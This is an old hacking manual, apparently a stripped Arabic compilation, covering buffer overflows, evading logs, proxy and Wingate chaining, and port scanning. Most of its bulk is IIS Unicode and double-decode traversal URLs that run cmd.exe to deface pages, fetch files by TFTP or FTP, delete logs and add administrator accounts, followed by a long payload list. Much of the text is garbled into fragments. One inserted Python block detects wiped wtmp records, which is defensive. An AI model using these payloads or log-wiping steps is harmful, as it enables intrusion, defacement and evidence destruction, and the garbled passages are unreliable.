If an attacker gets into the middle of a connection ssh notices and the session is disconnected rather than continued. The session is encrypted with one of three-key triple-DES, DES, RC4-128, TSS or Blowfish; never allow "encryption of type none"! ssh does not help when either machine itself is compromised, and ip spoofing and DNS spoofing can still be used against other services on the host.
Buffer Overflow

Contents:
1. Buffer Overflow
2. Processes
3. Memory management
4. Why a Buffer Overflow gives root

1. Buffer Overflow
The Buffer Overflow is the bug behind the most serious exploits around; the 'code red' worm spread through a Buffer Overflow in the MS web-server IIS. The idea: a program sets aside a fixed piece of memory (a buffer) for some input, say 15 bytes, and copies the input into it without checking its length. If 25 bytes arrive, 15 fill the buffer and the other 10 are written over whatever sits after it in memory. That is the "Overflow". Suppose memory holds three variables back to back:

<var1><var2><vname><Other things in memory>
 10b    6b    15b

var1 holds 10 bytes, var2 6 and vname 15. Copying the 25-byte string "abcabcabcabcabcabcabcabca bc" into vname gives:

somevalue2avalusabcabcabcabcabcabcabcabcabc
<var1 ><var2><vname ><other things go here>

vname has "overflowed" and the tail of the input now sits in "other things in memory", which may be another variable, a return address, or code. That overflow is what the attacker controls: instead of abc he supplies machine code and an address that makes the program jump into it. The bug is not a Windows speciality; linux programs written in C have it just the same.

2. Processes
A Process is a running program with its own memory. Modern systems are "Multi-process": the CPU switches between many processes, each one behaving as if it had the machine to itself.

3. Memory management
operating systems give every process virtual memory: the addresses a process sees are mapped by the OS onto real memory, and the process cannot read or write outside what it has been given. Inside its own area, though, the process is free, which is why an overflow can overwrite that process's own variables and return addresses without the Operating System objecting.

4. Why a Buffer Overflow gives root
Many network services and setuid programs run as Root. When one of them overflows, the code the attacker put into the buffer runs with that program's privileges, and if those are root's he owns the machine. That is why Buffer Overflows are the most sought-after bugs, and why input length must always be checked.
CGI
CGI = COMMON GATEWAY INTERFACE, the way a web server hands a request to an external program and returns that program's output as the page. The request arrives over HTTP, which runs on TCP/IP (port 80 by default). The client's input reaches the program in one of two ways, in the URL or in the body of the request, depending on the HTTP method:
1. GET
2. POST
3. PUT
HTTP itself is a plain text protocol like FTP and TELNET: you can type a request to a web server by hand over telnet and read the raw reply.
Anonymity and staying out of the logs

Introduction
Getting into a system is only half the job; the other half is not being caught. Every connection leaves traces in log files and the admin reads them, so the trail you leave matters more than the hole you used. Keep the exploits you use (0day or otherwise) to yourself, and remember that a hacker is caught far more often through people than through technology.

Eight points:
1. Be "Paranoid". Paranoia is the right attitude here, not a weakness: anyone you tell can talk, anything you keep can be found.
2. LoGs: assume every step is logged. Learn where the syslog configuration and logfile live and what checksum checking software the Admins run, before you touch anything.
3. Encryption: keep your own data unreadable. Disk encryption: MsDos SFS v1.7, SecureDrive 1.4b, Amiga EnigmaII v1.5, Unix CFS v1.33. file2file encryption: Triple DES, IDEA, Blowfish (32 rounds). Mail and files on Unix: PGP v2.6.x. Remote logins: SSH; a plain or DES Login is not enough.
4. Passwords: 8 characters or more (4 to 8 is too short), never written down, never reused between systems.
5. Storage: nothing sensitive as plain document files; keep it on an encrypted CD or HD partition.
6. Your own desk: the keyboard and the screen can be watched; the people around you are the weakest link.
7. Telnet sessions to your own systems and security chatter with others leave traces too; keep them apart from what you do elsewhere.
8. Logs again: the LoGS section below lists exactly which files record you and how to clean them.
LoGS
Three log files record every login:
- WTMP: log on/off (log in/logout) with tty and host
- UTMP: who is online now
- LASTLOG: the last login of each user
They are written by telnet, ftp, rlogin and every other login service. 99.9% of intruders are caught from these logfiles, so they have to be cleaned, and the cleaning must not be visible itself. ZAP (or ZAP2) is the classic tool; it needs root, because the log files are writable only by root, and it must be pointed at the right files. Default locations:
UTMP    : /etc or /var/adm or /usr/adm or /usr/var/adm or /var/log
WTMP    : /etc or /var/adm or /usr/adm or /usr/var/adm or /var/log
LASTLOG : /usr/var/adm or /usr/adm or /var/adm or /var/log, and per user $home/.lastlog

Your own traces
Besides the logs, /tmp and $HOME keep what you did: the $HOME Shell History files
sh   : .sh_history
csh  : .history
ksh  : .sh_history
bash : .bash_history
zsh  : .history
and Backup Files: ~*, dead.letter, *.bak.
To have the history removed automatically at logout (csh; run once after logging in):
mv .logout save.1
echo rm -rf .history>.logout
echo rm -rf .logout>>.logout
echo mv save.1 .logout>>.logout
The new .logout deletes the history, deletes itself and puts the original .logout back.
217
======================
. encrypted
partition .
) (
admin .
..
..
.. .
shells
background
!!!
. parametres
...
.
telnet http://www.host.com/ :
23
telnet
218
open
/http://www.host.com
..
backdoors .
) sub7 (
:
=============================
==
*******
sniffer ..
.
:
**********************
) (
hacker
...
219
!!!
...
* ) (
) ( admin .
) (
output sniffer
netstat
online
!! GateWay Server
* A gateway server in between
.
wtmp and lastlogs
. gateway
server
..
220
..
gateway server
..
==< ) root access
(
Dialup server
..
(= hacked system
:
dialup . hacking
server
) ( )
( dialup servers
!
:
221
lOGs ..
********************************************
******
***
.
..
:
- 1 :
. LSOF List Open
Files
- 2 )
( -
touch /tmp/check
222
=(
syslog configuration andlogfile
************************************
syslog function
..
syslog
logs
hosts ...
hosts
syslog /etc/syslog.conf
******************************
.
cron
/var/spool/cron/crontabs
. . Root
.
.
What the Admins look at
Administrators check a known list of files, so leave them exactly as found: .forward and alias files (a forward to your address is a giveaway), sulog (su root attempts), the group file (the admin, root, wheel, etc groups), passwd (new accounts, and the ones made with chid.c or changeid.c), .history/.sh_history/.bash_history, .profile/.login/.bash_profile and the alias definitions in them, and the system startup files.
Against binaries they run checksum checking: tripwire compares every file with a stored checksum, so anything you replace shows up unless the admin himself runs "tripwire --update /bin/target" after a change; a plain checksum list does the same job. 
Not every administrator throws the hacker out at once: some watch what he does and where he comes from, and the hacker who notices an administrator watching should leave quietly and not come back.
Rule: change nothing you do not have to change, and leave no file the admin has not seen before.

Log modifiers
Tools that alter the wtmp/utmp/lastlog entries come in four kinds:
Change    - Changes fields of the logfile to anything you want
Delete    - Deletes, cuts out the entries you want
Edit      - real Editor for the logfile
Overwrite - just Overwrites the entries with zero-value bytes
Don't use such software (f.e. zap)! It can be detected: a record of zero bytes in an append-only log is a hole that does not occur naturally.
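The "it can be detected" above is worth making concrete. The Python example below, added here and not part of the original text, builds a few wtmp records in the glibc utmp layout and finds the ones a zap-style tool has overwritten with zero bytes, plus records whose timestamps run backwards, which is what cutting an entry out of an append-only file leaves behind. The records are constructed in memory rather than read from /var/log/wtmp so the block runs anywhere; the struct layout is glibc's 384-byte little-endian utmp on x86.

```python
"""Find zeroed or out-of-order wtmp records. Added example; sample_wtmp()
constructs the file contents in the glibc utmp layout."""

import struct

# glibc struct utmp (x86/x86_64, little-endian): ut_type, pad, pid, line[32],
# id[4], user[32], host[256], exit (2 shorts), session, tv_sec, tv_usec,
# addr_v6[4], unused[20]  -> 384 bytes
UTMP_FMT = "<hxxi32s4s32s256shhiii4i20x"
UTMP_SIZE = struct.calcsize(UTMP_FMT)        # 384
USER_PROCESS, DEAD_PROCESS = 7, 8


def pack_record(ut_type, pid, line, user, host, tv_sec):
    """One utmp record; short string fields are NUL-padded by struct."""
    return struct.pack(UTMP_FMT, ut_type, pid, line.encode(), b"", user.encode(),
                       host.encode(), 0, 0, 0, tv_sec, 0, 0, 0, 0, 0)


def iter_records(blob):
    """Yield dicts for each whole record in the file contents."""
    for off in range(0, len(blob) - len(blob) % UTMP_SIZE, UTMP_SIZE):
        raw = blob[off:off + UTMP_SIZE]
        f = struct.unpack(UTMP_FMT, raw)
        yield {"index": off // UTMP_SIZE, "type": f[0], "pid": f[1],
               "line": f[2].rstrip(b"\0").decode("latin-1"),
               "user": f[4].rstrip(b"\0").decode("latin-1"),
               "host": f[5].rstrip(b"\0").decode("latin-1"),
               "time": f[9], "raw": raw}


def find_wiped(blob):
    """Return (zeroed_indexes, out_of_order_indexes).
    zeroed: records that are entirely NUL, the 'Overwrite' signature.
    out_of_order: a record with a timestamp earlier than the one before it,
    which an untouched append-only wtmp never has."""
    zeroed, out_of_order, last_time = [], [], 0
    for rec in iter_records(blob):
        if rec["raw"] == b"\0" * UTMP_SIZE:
            zeroed.append(rec["index"])
            continue
        if rec["time"] < last_time:
            out_of_order.append(rec["index"])
        last_time = rec["time"]
    return zeroed, out_of_order


def sample_wtmp():
    """Three constructed logins; the middle one has been zeroed the way zap does."""
    recs = [pack_record(USER_PROCESS, 1201, "pts/0", "alice", "10.0.0.5", 1_050_000_000),
            pack_record(USER_PROCESS, 1337, "pts/1", "root", "evil.example", 1_050_000_600),
            pack_record(USER_PROCESS, 1402, "pts/2", "bob", "10.0.0.9", 1_050_001_200)]
    recs[1] = b"\0" * UTMP_SIZE
    return b"".join(recs)


if __name__ == "__main__":
    zeroed, reordered = find_wiped(sample_wtmp())
    print("zeroed records:", zeroed, "out-of-order records:", reordered)
```

The zeroed-record check is exact; the ordering check is a heuristic, since a clock step can also move a timestamp backwards, so treat it as a reason to compare the file against a copy taken earlier or against the remote loghost.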
) ( "
> <
> :<
.
/http://hackergurus.tk
proxy server .
proxy server
/http://hackergurus.tk
. server
237
:...
bit
)(
.
.
. proxey server
lucky
. .
!
. .
proxy
server
download #..
238
10.
proxy server.
Refresh
Reload
Why use a Proxy Server
=) (=
. .
.
!!!
:
ISP
Internet Service Provider
.
Traffic
.
proxy server
239
.
ip
ip .
.
.
.
proxy port
proxy server
!! (..
.
cach.microsoft.com 80
-1
-2
240
-3
.
Logs
Introduction to Wingate
=) =(Wingate
WinGate
proxy server firewall
.
) Anonymously
(
.
WinGate
:
-----------------------------------------------------------------------------------------241
DIScover
. !!!
. WinGate
WinGate
SyGate
) Logs(
WinGate Server 48
) ISP's (
. wingate
How do I find Wingates
=) WinGate(=
. wingate
. .
WinGate Scanner
243
google
/http://www.google.com
ip hostname
@home
:
wingates
wingate NetWork
...
Unix :
Trial and Error
wingate 23
. ) Guest(
Anonymously
Introduction to Socks Host
=) =(Socks Host
Socks Host WinGate
244
1080
**********************
**********************
Ghost Surf
$$$$$$$$$$$$$$$$$$$$$$
Stealther
------------------------------------------
-------------------------------------------
%100
245
"
) ( "
Chaining Proxies and Wingates

A proxy hides your ip address behind its own and the target sees the proxy's Domain, but the proxy keeps logs, so chain several: each hop only knows the one before it. Lists of working proxies:
http://www.multiproxy.org/anon_list.htm
http://tools.rosinstrument.com/proxy/
and the yahoo Group P_R_O_X_Y@yahoogroups.com (subscribe at P_R_O_X_Y-subscribe@yahoogroups.com).
Test that a proxy really hides you (some Replay your real Ip in the headers):
http://www.privacy.net/
http://www.proxytester.com/

A proxy server can sit in front of any service (WebSite, IRC Chat, etc):
[User]>>>>>[Proxy]>>>>>[Web Pages]

Proxy Chaining
[User]>>>[Proxy1]>>>[Proxy2]>>>[Proxy3]>>>[Proxy4]>>>[Destination]
Destination = web page, Unix server, ftp server, etc. Chaining works for any server you reach by telnet, ftp or http. It is not 100%: the Adminstrator Logs on every proxy still exist, and an ftp session can be traced back hop by hop if the proxy owners cooperate, but every extra proxy makes that harder.

HTTP Chaining
Some HTTP proxies take the destination as part of the Address, so proxies can be chained inside one URL:
http://proxy.magusnet.com/-_-http://www.google.com
(the -_- is that proxy's separator). Two in a row:
http://proxy.server1.com/-_-http://proxy.server2.com/-_-http://www.destination.com
Another form, with / as the separator:
http://anon.free.anonymizer.com/http://www.google.com
http://proxy1/http://proxy2:80/proxy3:80/http://www.yahoo.com
where proxy1, proxy2, proxy3 are the proxy addresses.

Browser Chaining
Internet Explorer: to use a proxy such as 213.234.124.23 port 80 instead of your ISP's: Tools, Internet Options, Connections, Settings, then Address 213.234.124.23 and Port 80. To chain proxies in the browser, list several in the Address field separated by spaces:
Address: 213.234.124.23:80 121.172.148.23:80 143.134.54.67
Port: 80

Wingates
A Wingate proxy server listens on port 23 (Telnet); when you connect it shows a Wingate> prompt, and whatever host and port you type after it is where it connects next. Wingates that are online now can be found with WinScan (Download it) or by scanning ip ranges for port 23; the Admin of an open wingate rarely notices the extra connections.

Chaining Wingates Using Telnet
Each Wingate connects you to the next; the Telnet chain is slow but it works. Connect to the first with telnet on port 23, then type the next address and port at each Wingate> prompt:

C:\WINDOWS>telnet 61.133.119.130 23
Wingate> 203.207.173.166 23
Wingate> 213.17.99.45 23
Wingate> 10.65.212.7 23
WinGate> arbornet.org

C:\Windows> telnet 61.133.119.130 23
Wingate> 203.207.173.166 23
Wingate> 135.245.18.167 23
Wingate> m-net.arbornet.org
Connecting to host arbornet.org...Connected
Logs and proxy services

Unix is a Multi-User Mode system (Linux is the Unix most people meet) built to be operated by many users at once, so it keeps a record of who did what: a LOG File for logins, for every service, for mail, each with the IP address the connection came from. Microsoft Windows, Linux and Mac all keep such logs, and web servers keep log files of every request. The log file is the first thing the admin reads after a break-in, and the first thing you clean. WIN NT keeps its own event logs in the same role.

On a Unix host the traces of your session are:
lastlogin (lastlog: your last login time and host)
.bash_history (every command you typed)
contactemail and similar files in your home
Tmp and trash
etc.
lastlogin and .bash_history are the two that matter. The history goes with rm:
rm .bash_history
On a host reached through cpanel the same files live in your account's home, and you work on them from a shell on localhost, i.e. on the host itself.

Proxy protocols
A web proxy speaks the HTTP Protocol; a generic proxy speaks the SOCKS Protocol. Microsoft Proxy Server offers three services:
1. Web Proxy Service: the HTTP Protocol, i.e. browsers.
2. WinSock Proxy Service: for windows NT clients; it relays any WinSock application Protocol (telnet, FTP, ...).
3. Socks Proxy Service: the SOCKS protocol.
It supports SSL (Secure Sockets Layers), runs on IIS (Internet Information Server) on Windows NT, and relays FTP, Telnet, Gopher, IRC, RealAudio and POP3. Together with a firewall it is the security boundary of the network.

TCP/IP
TCP/IP is the protocol family the Internet runs on; the layered model comes from ISO (International Organization for Standardization), and TCP is the Transmission Control Protocol. Tools built on it: Ping, Traceroute, DNS lookup, Finger, Whois, LDAP, SNMP. WIN NT and UNIX both ship TCP/IP, and a Router moves packets between networks on the basis of their addresses. Common ports:
Port 21 = FTP
Port 23 = Telnet
Port 25 = SMTP
Port 53 = DNS
Port 79 = Finger
Port 80 = HTTP
Port 110 = POP3

HTTPort
HTTPort tunnels any TCP/IP connection through the ISP's HTTP Proxy Server, so protocols the proxy would not otherwise pass (telnet, ftp, SOCKS) still get out, and the proxy sees only (Anonymous) HTTP.

AnalogX Proxy
Supports HTTP (web), HTTPS (secure web), POP3 (receive mail), SMTP (send mail), NNTP (newsgroups), FTP (file transfer), and Socks4/4a and partial Socks5 (no UDP) protocols! It works great with Internet Explorer, Netscape, AOL, AOL Instant Messenger, Microsoft Messenger, and many more!
http://www.analogx.com/files/proxyi.exe

PortBlocker
PortBlocker is configured to block the most common types of servers that might be on a system (FTP, HTTP, etc), so will not require any modification for most users. If you are running a special server of some sort, then you can easily add ...
http://www.analogx.com/files/pblocki.exe

Proxy Log Analyzer
Reads the proxy's log files. Installer (1.07 MB): http://www.mechanicalminds.com/software/pla/setup.exe
ZIP archive with instructions (818 kb): http://www.mechanicalminds.com/software/pla/pla.zip

Browser proxy setting (the Internet Explorer help text): Provides a space for you to type the address and port number of the proxy server you want to use to gain access to the Internet over HTTP, Secure, FTP, Gopher, and Socks protocols.

HTTPort 3snf
Download: http://www.angelfire.com/tv2/ssdd63/httport3snf.zip
(by FAHAD)
Port mapping: in HTTPort open Port mapping, Add, New mapping, and fill in
Local port : 80
Remote host : webcache.bt.net
Remote port : 3128
then go back to the Proxy tab and press Start. Point the browser at 127.0.0.1 port 80 and every request is tunnelled to webcache.bt.net:3128.
> <
294
> :<
:
=) (=
^^^^^^^^^^^^^^^^^^^
/http://www.netcraft.com
^^^^^^^^^^^^^^^^^^^
=) (=
^^^^^^^^^^^^^^^^^^^
.
/http://www.almodammer.com
.
dfl;kjgk'dgjbumpipt@almodammer.c
om
295
Headers
^^^^^^^^^^^^^^^^^^^
=) (=
^^^^^^^^^^^^^^^^^^^
Banners
..
Telnet Client
.
FTP 21
TELNET 23
^^^^^^^^^^^^^^^^^^^
=) (=
^^^^^^^^^^^^^^^^^^^
HTTP
296
= XXX
.
:
Windows 9x/NT Intel 32
Windows 9x/NT Intel 128
Windows 2000 Intel 128
DigitalUnix 4.0 Alpha 60
Unisys x Mainframe 64
Linux 2.2.x Intel 64
FTX(UNIX) 3.3 STRATUS 64
SCO R5 Compaq 64
Netware 4.11 Intel 128
AIX 4.3.x IBM/RS6000 60
AIX 4.2.x IBM/RS6000 60
Cisco 11.2 7507 60
Cisco 12.0 2514 255
IRIX 6.x SGI 60
FreeBSD 3.x Intel 64
OpenBSD 2.x Intel 64
Solaris 8 Intel/Spar 64
Solaris 2.x Intel/Sparc 255
298
: ) data list or packet.
( Nodes TTL 1
tracert
traceroute
tracert ip
=ip
^^^^^^^^^^^^^^^^^^^
=) (=
^^^^^^^^^^^^^^^^^^^
Windows
299
:
) N-Stealth
...(
=============
( Shadow Sceurity Scanner
(
=============
( SuperScan
List (
----------------------------------------------------------------------- Linux
Nmap
) Network Maper
(
Linux
300
//
:
nmap
/
Nmap V. 3.00 Usage: nmap [Scan Type(s)] [Options]
Some Common Scan Types ('*' options require root privileges)
* -sS TCP SYN stealth port scan (default if privileged (root))
  -sT TCP connect() port scan (default for unprivileged users)
* -sU UDP port scan
  -sP ping scan (Find any reachable machines)
* -sF,-sX,-sN Stealth FIN, Xmas, or Null scan (experts only)
  -sR/-I RPC/Identd scan (use with other scan types)
Some Common Options (none are required, most can be combined):
* -O Use TCP/IP fingerprinting to
  network interface
  --interactive Go into interactive mode (then press h for help)
Example: nmap -v -sS -O http://www.my.com/ 192.168.0.0/16 '192.88-90.*.*'
SEE THE MAN PAGE FOR MANY MORE OPTIONS, DESCRIPTIONS, AND EXAMPLES
!!!!!!!!!
man
page ..
nmap -sS -O -vv almodammer.com
=almodammer.com
.......
^^^^^^^^^^^^^^^^^^^
=( (=
^^^^^^^^^^^^^^^^^^^
Linux Shell
Account
Linux Shell
.
Linux
whois
Linux
man whois
-----------------------------------------------------------------
google
http://www.google.com/search?q=whois&btnG=Google+Search
.
cgi.
netcraft ..............
"
"
> <
>>P @ LH@CKERZ :
1
//:http
:
\
/http://www.XXX.com
/
2
3
4
5
6
7
8
9
10
11
11 10 :
12
:
.
.
"
) ( "
><
><sNiper_hEx :
) 13
( -:
. . . .
. CMD
.
. ECHO
CMD .
Access Denied
.
. FTP
.
. TFTP
.
.
IIS4.0 /
IIS5.0 . NT4 / Win2k
.
anonymous person
.
.
. -:
-1
.
. .
-2
.
.
. IIS4 / IIS5
CMD
.
. CMD
CMD
-:
:
http://www.xxxx.com/msadc
/..%c0%af../..
%c0%af../winnt/system32/c
md.exe?/c+md+c:\hEx
:
http://www.xxxx.com/msadc
/..%c0%af../..
%c0%af../winnt/system32/c
md.exe?/c+rd+c:\hEx
:
:
http://www.xxxx.com/msadc
/..%c0%af../..
%c0%af../winnt/system32/c
md.exe?/c+copy+c:\winnt\sy
stem32\cmd.exe+c:\inetpub\
scripts\hEx.exe
:
http://www.xxxx.com/msadc
/..
%c0%af../winnt/system32/c
md.exe?/c+move+c:\winnt\s
ystem32\cmd.exe+c:\inetpub
\scripts\hEx.exe+c:\
:
http://www.xxxx.com/msadc
/..%c0%af../..
%c0%af../winnt/system32/c
md.exe?/c+del+c:\hEx.mdb
:
http://www.xxxx.com/msadc
/..
%c0%af../winnt/system32/c
md.exe?/c+ren+c:\index.htm
+hEx.htm
:
http://www.xxxx.com/msadc
/..%c0%af../..
%c0%af../winnt/system32/c
md.exe?/c+type+c:\hEx.txt
:
http://www.xxxx.com/msadc
/..
%c0%af../winnt/system32/c
md.exe?/c+echo+sNiper_hEx
+>c:\hEx.txt
:
:
http://www.xxxx.com/msadc
/hEx.mdb
.
-:
http://www.xxxx.com/scripts
/..
%c1%1c../winnt/system32/c
\:md.exe?/c+dir+c
http://www.xxxx.com/scripts
/..
%c0%9v../winnt/system32/c
\:md.exe?/c+dir+c
http://www.xxxx.com/scripts
/..
%c0%af../winnt/system32/c
\:md.exe?/c+dir+c
http://www.xxxx.com/scripts
/..
%c0%qf../winnt/system32/c
\:md.exe?/c+dir+c
http://www.xxxx.com/scripts
/..
%c1%8s../winnt/system32/c
\:md.exe?/c+dir+c
http://www.xxxx.com/scripts
/..
%c1%9c../winnt/system32/c
\:md.exe?/c+dir+c
http://www.xxxx.com/scripts
/..
%c1%pc../winnt/system32/c
\:md.exe?/c+dir +c
-:
Msadc , _vti_bin , iisadmpwd ,
_vit_admin , scripts ,
samples , cgi-bin
. ECHO
-:
http://www.xxxx.com/msad
c/..%c0%af../..
%c0%af../winnt/system32/
\:cmd.exe?/c+dir+c
w3svc.exe
inetpub\scripts
-:
http://www.xxxx.com/msad
c/..%c0%af../..
%c0%af../winnt/system32/
?cmd.exe
c+copy+c:\winnt\system32
\cmd.exe+c:\inetpub\script
s\w3svc.exe
w3svc.exe
inetpub\scripts
-:
http://www.xxxx.com/scrip
\:ts/w3svc.exe?/c+dir+c
inetpub\wwwroot\index.ht
m
-:
http://www.xxxx.com/scrip
ts/w3svc.exe?/c+echo+Hac
ked+By+sNiper_hEx+hExRa
y@Hotmail.com+>+c:\inetp
ub\wwwroot\index.htm
CMD .
CMD
-:
http://www.xxxx.com/msad
c/..%c0%af../..
%c0%af../winnt/system32/
cmd.exe?
c+copy+c:\winnt\system32
\cmd.exe+c:\inetpub\script
s\cmd1.exe
. CMD
-:
http://www.xxxx.com/msad
c/..%c0%af../..
%c0%af../winnt/system32/
\:cmd1.exe?c+dir+c
Access Denied .
Access Denied
Access Denied
-:
-1 CMD
CMD1
. Copy.
-:
http://www.xxxx.com/msad
c/..%c0%af../..
%c0%af../winnt/system32/
?cmd.exe
c+copy+c:\winnt\system32
\cmd.exe+c:\inetpub\script
s\cmd1.exe
-2 ssinc.dll
-:
o test.shtml
o
wwwroot/hEx/test.shtml
o >!#--
<--"include file="AAAA[...]AA
A
2049 .
o
http://www.xxxx.com/test.sht
ml
o .
o
. Access Denied
o 500
.
-3 . NC.exe
Temp
Temp .
-4
.
.
-5 root.exe :
sensepost.exe shell.exe
w3svc.exe
c:\inetpub\scripts
.
. FTP
Scripts CMD -1
Shell.exe
/
c+copy+c:\winnt\system32
\cmd.exe+c:\inetpub\script
s\shell.exe
mspft.pll -2
open Echo
. ftp.host.com
. FTP
/
c+echo+open+ftp.host.com+
>+c:\winnt\mspft.ppl
-3
Anonymous
mspft.pll
/
shell.exe?/c+echo+anonymo
us+>>+c:\winnt\mspft.ppl
-4
hExRay@Hotmail.Com
mspft.pll
/
shell.exe?/c+echo+hEx@Hot
mail.Com+>>+c:\winnt\ms
pft.ppl
. Anonymous User -5
mspft.pll
/
shell.exe?/c+echo+user+an
onymous+>>+c:\winnt\msp
ft.ppl
-6
/
shell.exe?/c+echo+hEx@Hot
mail.Com+>>+c:\winnt\ms
pft.ppl
.g
/
shell.exe?/c+echo+lcd+c:\in
etpub\wwwroot+>>+c:\win
nt\mspft.ppl
-8 FTP
. FTP Get
index.htm
/
shell.exe?/c+echo+get+inde
x.html+>>+c:\winnt\mspft.
ppl
-9 Quit
/
>>shell.exe?/c+echo+quit+
+c:\winnt\mspft.ppl
-10 FTP.exe?+"-
s:c:winnt\mspft.ppl
mspft.ppl -:
Open FTP.host.com Anonymous hEx@Hotmail.Com User Anonymous hEx@Hotmail.Com Get index.html Quit msadc/..%c0%af../../
%c0%af../winnt/system32/
ftp.exe?+""s:c:\winnt\mspft.ppl
.
Microsoft )
. ( Access L0phtCrack
-:
\ _ .SAM
\winnt\repair
L0phtCrack
-:
PASSFILT.DLL
-:
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Lsa\SYSTEM32\PASSFILT.DLL
. ASP
MySQL
) ( htr.+
-:
http://www.xxxx.com/defa
ult.asp+.htr
database.inc
.
.
. TFTP
-1
index.htm \:c
-2 TFTP
.
c+tftp.exe+"-/
i"+1.1.1.1+GET+index.ht
m+C:\inetpub\wwwroot
\index.htm
.
tftp.ex
e
.
""i-
1.1.1.1
.
GET
index.
htm
\
inetpu
b\ww
\wroot
index.
htm
.
Log
System32 -:
/
c+del+c:/winnt/system32/lo
gfiles/*.log
"
) ( "
> . <
..
..
:
------------- )(
. cmd cmd1
:
+C+copy+c:\winnt\system32
c:\winnt\system32\cmd1.exe
.. Echo
CMD1.exe
) ( !
..
IWAM_USER .
Guest
. IIS
Guest
!! (:
(: * nix Microsot
(:
Administrator
(:
..
.
(: .
..
+ :
Sechole.exe .
Kill.exe
Tlist.exe
ncx99.exe
tftpd32.exe
.. (:
:
Sechole - 1
.. )
(
..
. . . (:
Tlist - 2.
.. +
(:
Kill.exe -3 .
.
NCX99 -3 NC
99
TFTP32.exe -4 ..
(:
:
..
ncx99.exe :
http://target/scripts/..../winnt/syst
em32/cmd1.exe?/c+C:\ncx99.exe
.. 99
CMD =
. Guest
.. TLIST
..
PID ..
..
PID
..
Kill :
.. KILL.exe PID PID (:
!
..
Sechole ..
. ..
(: Sechole.exe .
IWAM_USER
.. Administrators
. Access Denided
:
+C+Echo+Hacked+by+XDeMoNX
< C;\inetpub\wwwroot\index+
htm.
..
... (:
:
IWAM_USER
: ..
!
.
.
(: .. .
Administrator
.
!! (: (:
:
net user Demon pass /add && net
localgroup administrators Demon
/add Save as . add.bat
: .
Demon Pass
(: ..
add.bat
) (
(:
.. (:
(:
)
!(
.
..
netstat -an
..
(:
90%
(: 139
(:
(:
.. . (:
.
..
. GUI
..
GEtAdmin Sechole2
.. WINvnc
"
"
><
> : <
:
(1
(2 TFTPD
(3
=============================
====================
=============================
====================
(1
/http://www.devil2k.com
)) ((
msadc/..%255c../..%255c../../
%255c../winnt/system32/cmd.exe?/c
\:+dir+c
msadc/../
%25%35%63../..%25%35%63../..%25
%35%63../winnt/system32/cmd.exe?
\:/c+dir+c
msadc/..%255c..%255c..%255c../
%255cwinnt/system32/cmd.exe?/c+
\:dir+c
msadc/../
%25%35%63..%25%35%63..%25%35
%63..%25%35%63winnt/system32/c
\:md.exe?/c+dir+c
scripts/..%255c../
%255cwinnt/system32/cmd.exe?/c+
\:dir+c
scripts/..%252f..%252f..%252f../
%252fwinnt/system32/cmd.exe?/c+d
\:ir+c
scripts/..%255c../
%255cwinnt/system32/cmd.exe?/c+
\:dir+c
msadc/..%255c../..%255c../../
%255c../winnt/system32/cmd.exe?/c
\:+dir+c
msadc/..%%35c../..%%35c../..%/
%35c../winnt/system32/cmd.exe?/c+
\:dir+c
msadc/..%%35%63../..%/
%35%63../..%
%35%63../winnt/system32/cmd.exe?
\:/c+dir+c
msadc/../
%25%35%63../..%25%35%63../..%25
%35%63../winnt/system32/cmd.exe?
\:/c+dir+c
MSADC/..%255c..%255c..%255c../
%255cwinnt/system32/cmd.exe?/c+
\:dir+c
MSADC/..%%35c..%%35c..%%35c../
%
%35cwinnt/system32/cmd.exe?/c+di
\:r+c
MSADC/..%%35%63..%%35%63..%/
%35%63..%
%35%63winnt/system32/cmd.exe?/c
\:+dir+c
MSADC/../
%25%35%63..%25%35%63..%25%35
%63..%25%35%63winnt/system32/c
\:md.exe?/c+dir+c
vti_bin/..%255c..%255c..%255c.._/
%255c..
%255c../winnt/system32/cmd.exe?/c
\:+dir+c
vti_bin/..%%35c..%%35c..%%35c.._/
%%35c..%
%35c../winnt/system32/cmd.exe?/c+
\:dir+c
vti_bin/..%%35%63..%%35%63..%_/
%35%63..%%35%63..%
%35%63../winnt/system32/cmd.exe?
\:/c+dir+c
vti_bin/.._/
%25%35%63..%25%35%63..%25%35
%63..%25%35%63..%25%35%63../wi
\:nnt/system32/cmd.exe?/c+dir+c
PBServer/..%255c..%255c../
%255cwinnt/system32/cmd.exe?/c+
\:dir+c
PBServer/..%%35c..%%35c..%/
%35cwinnt/system32/cmd.exe?/c+di
\:r+c
PBServer/..%%35%63..%/
%35%63..%
%35%63winnt/system32/cmd.exe?/c
\:+dir+c
PBServer/../
%25%35%63..%25%35%63..%25%35
%63winnt/system32/cmd.exe?/c+dir
\:+c
Rpc/..%255c..%255c../
%255cwinnt/system32/cmd.exe?/c+
\:dir+c
Rpc/..%%35c..%%35c..%/
%35cwinnt/system32/cmd.exe?/c+di
\:r+c
Rpc/..%%35%63..%%35%63..%/
%35%63winnt/system32/cmd.exe?/c
\:+dir+c
Rpc/../
%25%35%63..%25%35%63..%25%35
%63winnt/system32/cmd.exe?/c+dir
\:+c
vti_bin/..%255c..%255c..%255c.._/
%255c..
%255c../winnt/system32/cmd.exe?/c
\:+dir+c
vti_bin/..%%35c..%%35c..%%35c.._/
%%35c..%
%35c../winnt/system32/cmd.exe?/c+
\:dir+c
vti_bin/..%%35%63..%%35%63..%_/
%35%63..%%35%63..%
%35%63../winnt/system32/cmd.exe?
\:/c+dir+c
vti_bin/.._/
%25%35%63..%25%35%63..%25%35
%63..%25%35%63..%25%35%63../wi
\:nnt/system32/cmd.exe?/c+dir+c
samples/..%255c..%255c..%255c../
%255c..%255c..
%255cwinnt/system32/cmd.exe?/c+
\:dir+c
cgi-bin/..%255c..%255c..%255c../
%255c..%255c..
%255cwinnt/system32/cmd.exe?/c+
\:dir+c
iisadmpwd/..%252f..%252f..%252f../
%252f..%252f..
%252fwinnt/system32/cmd.exe?/c+d
\:ir+c
vti_cnf/..%255c..%255c..%255c.._/
%255c..%255c..
%255cwinnt/system32/cmd.exe?/c+
\:dir+c
adsamples/..%255c..%255c..%255c../
%255c..%255c..
%255cwinnt/system32/cmd.exe?/c+
\:dir+c
scripts/..%C1%1C..%C1%1C../
%C1%1C..
%C1%1Cwinnt/system32/cmd.exe?/
\:c+dir+c
scripts/..%C1%9C..%C1%9C../
%C1%9C..
%C1%9Cwinnt/system32/cmd.exe?/
\:c+dir+c
scripts/..%C0%AF..%C0%AF../
%C0%AF..
%C0%AFwinnt/system32/cmd.exe?/
\:c+dir+c
scripts/..%252f..%252f..%252f../
%252fwinnt/system32/cmd.exe?/c+d
\:ir+c
scripts/..%255c../
